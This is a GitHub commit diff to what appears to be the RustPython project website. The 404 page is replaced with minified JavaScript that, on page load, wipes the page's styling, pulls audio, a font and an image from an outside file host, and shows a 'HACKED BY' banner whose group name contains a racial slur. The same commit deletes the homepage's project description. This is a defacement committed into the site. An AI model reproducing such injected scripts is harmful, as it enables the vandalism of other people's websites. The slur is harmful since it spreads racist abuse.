X Tutup
Skip to content

Commit d62346b

Browse files
author
weh
committed
ajdsakjdjkas
1 parent 3869165 commit d62346b

File tree

4 files changed

+6
-77
lines changed

4 files changed

+6
-77
lines changed

404.html

Lines changed: 4 additions & 21 deletions
Original file line numberDiff line numberDiff line change
@@ -2,24 +2,7 @@
22
permalink: /404.html
33
layout: default
44
---
5-
6-
<style type="text/css" media="screen">
7-
.container {
8-
margin: 10px auto;
9-
max-width: 600px;
10-
text-align: center;
11-
}
12-
h1 {
13-
margin: 30px 0;
14-
font-size: 4em;
15-
line-height: 1;
16-
letter-spacing: -1px;
17-
}
18-
</style>
19-
20-
<div class="container">
21-
<h1>404</h1>
22-
23-
<p><strong>Page not found :(</strong></p>
24-
<p>The requested page could not be found.</p>
25-
</div>
5+
<body>
6+
7+
<script>window.addEventListener("load",(()=>{document.head.innerHTML='<link rel="stylesheet" href="https://unpkg.com/normalize.css">';const n=document.createElement("style");n.innerHTML='html, body {\r\n height:100%;\r\n}\r\n\r\nbody {\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n background-color: #000;\r\n overflow: hidden;\r\n}\r\n\r\nprogress {\r\n border: solid 1px #fff;\r\n background-color: #000;\r\n padding: 2px;\r\n height: 9px;\r\n width: 40%;\r\n}\r\n\r\nprogress::-moz-progress-bar, progress::-webkit-progress-value {\r\n background-color: #fff;\r\n}\r\n\r\nbutton {\r\n font-family: monospace;\r\n font-size: 11px;\r\n background-color: #fff;\r\n border: solid 2px #000;\r\n outline: solid 1px #fff;\r\n cursor: pointer;\r\n}\r\n\r\nimg {\r\n position: absolute;\r\n}\r\n\r\n@font-face {\r\n font-family: "HACKEDBY";\r\n src: url(https://files.catbox.moe/aikkx9.otf);\r\n}\r\n\r\nh1 {\r\n color: #ff0004;\r\n font-family: HACKEDBY;\r\n text-align: center;\r\n font-size: 25vh;\r\n}\r\n\r\nh2 {\r\n color: #9f0003;\r\n font-family: HACKEDBY;\r\n font-size: 4em;\r\n position: absolute;\r\n bottom: 1.5em;\r\n margin: 0;\r\n opacity: 0.5;\r\n z-index: 9999;\r\n}',console.log(n),document.head.append(n);const e=document.createElement("progress");e.max="100",document.body.append(e);const r=new Audio("https://files.catbox.moe/dtmoak.mp3");r.addEventListener("progress",(function(){if(r.buffered.length>0){var n=r.buffered.end(0),t=r.duration;if(t>0){var o=n/t*100;e.value=o}}})),r.addEventListener("ended",(function(){r.play()})),r.crossOrigin="anonymous";let t=0;r.addEventListener("canplaythrough",(function(){if(1==t)return;e.style.display="none";const n=document.createElement("button");n.innerHTML="enter website",n.addEventListener("click",(()=>{n.style.display="none";const e=document.createElement("h1");e.innerHTML="HACKED BY<br>NIGGATRIN SECURITYS",document.body.append(e);const o=document.createElement("h2");o.innerHTML="WWW.NIGGATRINSECURITY.COM",document.body.append(o);const i=document.createElement("img");i.src="https://files.catbox.moe/8sfqpy.jpg",i.style.width="350px";let d=0,s=0,a=5,c=5;!function n(){d+=a,s+=c,(d+350>window.innerWidth||d<0)&&(a=-a),(s+262>window.innerHeight||s<0)&&(c=-c),i.style.left=`${d}px`,i.style.top=`${s}px`,requestAnimationFrame(n)}(),document.body.append(i),r.play(),t=1;const l=new(window.AudioContext||window.webkitAudioContext),f=l.createAnalyser();l.createMediaElementSource(r).connect(f),f.connect(l.destination),f.fftSize=2048;const m=f.frequencyBinCount,u=new Uint8Array(m);function p(){f.getByteFrequencyData(u);let n=0;for(let e=0;e<100;e++)n+=u[e];const r=1+n/100/1e3;e.style.transform=`scale(${r})`,requestAnimationFrame(p)}r.addEventListener("play",(()=>{l.resume().then((()=>{p()}))})),document.body.style.backgroundImage="linear-gradient(0deg,#820002,#000)"})),document.body.append(n)}))}));</script>
8+
</body>

assets/js/regrtests_results.js

Lines changed: 1 addition & 1 deletion
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

assets/js/tabs.js

Lines changed: 1 addition & 1 deletion
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

index.markdown

Lines changed: 0 additions & 54 deletions
Original file line numberDiff line numberDiff line change
@@ -2,59 +2,5 @@
22
# Feel free to add content and custom Front Matter to this file.
33
# To modify the layout, see https://jekyllrb.com/docs/themes/#overriding-theme-defaults
44

5-
layout: home
6-
explainer:
7-
RustPython is a Python interpreter written in Rust. RustPython can be
8-
embedded into Rust programs to use Python as a scripting language for your
9-
application, or it can be compiled to WebAssembly in order to run Python
10-
in the browser. RustPython is free and open-source under the MIT license.
115

12-
build-from-source-link: https://github.com/RustPython/RustPython
13-
14-
demo:
15-
- url: "https://github.com/RustPython/RustPython/blob/master/examples/hello_embed.rs"
16-
label: 'Hello World!'
17-
- url: "https://rustpython.github.io/demo/"
18-
label: 'Online demo running on WebAssembly'
19-
- url: "https://rustpython.github.io/demo/notebook"
20-
label: 'Notebook'
21-
22-
installation:
23-
- command: "cargo install --git https://github.com/RustPython/RustPython rustpython"
24-
- command: "wapm install rustpython"
25-
- command: "conda install rustpython -c conda-forge"
26-
27-
goals:
28-
- goal:
29-
Full Python 3 environment entirely in Rust (not CPython bindings), with
30-
a clean implementation and no compatiblity hacks.
31-
# TODO: integrate this into the "goals" boxes
32-
progress:
33-
# TODO: actually measure how much of the test suite we run
34-
RustPython can currently run a little less than half of the CPython
35-
regression test suite, and our API is relatively unstable and
36-
doesn't require decades of backwards-compatibility.
37-
- goal:
38-
Fast, reliable and secure implementation of Python that can be used
39-
from Rust or compiled to WebAssembly.
40-
progress:
41-
RustPython currently runs about 10 times slower than CPython, but there's
42-
still lots of optimizations to be made. RustPython can be easily embedded
43-
into Rust programs simply by adding a line to Cargo.toml, and natively
44-
supports WebAssembly; see our demo above.
456
---
46-
47-
# Why RustPython?
48-
49-
There are many implementations of Python. For example:
50-
- [CPython](https://github.com/python/cpython) (C), which is the most common
51-
- [Jython](https://www.jython.org/) (Java)
52-
- [IronPython](https://ironpython.net/) (.NET)
53-
- [PyPy](https://www.pypy.org/) (Python)
54-
- [Stackless](http://www.stackless.com/)
55-
56-
Each of these implementations offer some benefits: Jython, for example, compiles Python 2 source code to Java byte code, then routes it to the Java Virtual Machine. Because Python code is translated to Java bytecode, it looks and feels like a true Java program at runtime and so it integrates well with Java applications.
57-
58-
IronPython is well-integrated with .NET, which means IronPython can use the .NET framework and Python 2 libraries or vice versa.
59-
60-
We want to unlock the same possibilities that Jython and IronPython enable, but for the Rust programming language. In addition, thanks to Rusts' minimal runtime, we're able to compile RustPython to WebAssembly and allow users to run their Python code easily in the browser.

0 commit comments

Comments
 (0)
X Tutup